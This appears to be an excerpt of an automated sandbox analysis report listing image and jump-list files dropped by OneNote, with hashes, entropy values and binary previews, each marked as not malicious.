.v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Temp\{F2D0A424-8631-4965-91AB-9B959A45F8C2}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Temp\{F3389BA3-BFFB-4915-A36A-C38867FFD896}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{F4978B6A-F788-4A8B-A1A7-24A7013D6661}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{F5903642-0B22-41E2-A14F-CF58D0DA93B6}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{F624B55A-1650-405B-A72D-3E0E526C9F33}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	567
Entropy (8bit):	7.499095532051442
Encrypted:	false
SSDEEP:	12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
MD5:	D055CE625528E448C61315EAAEF5BB71
SHA1:	029DF4C872B1C154F32E7FE94F434547C3BA6192
SHA-256:	85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
SHA-512:	705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{\|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...\|...a<!..d....IEND.B`.

C:\Users\user\AppData\Local\Temp\{F698A0E8-5AD4-4476-AB43-CD902D10DF96}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{F6FEB43A-0F3E-4816-836E-5699BC1301AC}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{F76D221A-E1E5-4361-90FF-9BE87B60C3F6}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{F94F6A97-BBA5-41B8-8CDF-5243CF1315B8}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{F9AF5CEF-C5D6-4A8D-A1F3-262BE8366D35}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{F9F64A55-68CE-4E19-8130-A967A8D1A629}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{FBF54453-CA90-4BF4-A2D3-B7596538A521}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{FF52E6D8-A87D-45B4-B471-10AF628AF715}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3873
Entropy (8bit):	3.488422238589052
Encrypted:	false
SSDEEP:	48:zI82hdO7MbIFRbqzqgdCDDGTCDutodR2hdO7Mbh7+1qqGqzWk7dCDGWG5CD1tjgH:zldSqfGfoDaALZhcj4
MD5:	3228B4F8D242C66128DE7868D37073A9
SHA1:	78080074FB675C1794F67518496566DAFAA130D9
SHA-256:	E30D80C78F4E65C713F24C78E7DF83634A7E5F8B222FBB5D16BF4F15ED50C5F9
SHA-512:	FF66F1C646E62DC2BE58856B0DE522C021323DFCB04418746E81804B19812E140C9DD835F8ECA3D5E2D9E2C2CCEBDDFD9B0974C005D6CF1E0E36FE96B7E21397
Malicious:	false
Preview:	...................................FL..................F.@.. .....Q{.....(..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qVf.....................V.......6.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qVf......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qVf......].....................u..O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qVk...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IT6SPRAB9YJU3HR4PB0U.temp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3873
Entropy (8bit):	3.488422238589052
Encrypted:	false
SSDEEP:	48:zI82hdO7MbIFRbqzqgdCDDGTCDutodR2hdO7Mbh7+1qqGqzWk7dCDGWG5CD1tjgH:zldSqfGfoDaALZhcj4
MD5:	3228B4F8D242C66128DE7868D37073A9
SHA1:	78080074FB675C1794F67518496566DAFAA130D9
SHA-256:	E30D80C78F4E65C713F24C78E7DF83634A7E5F8B222FBB5D16BF4F15ED50C5F9
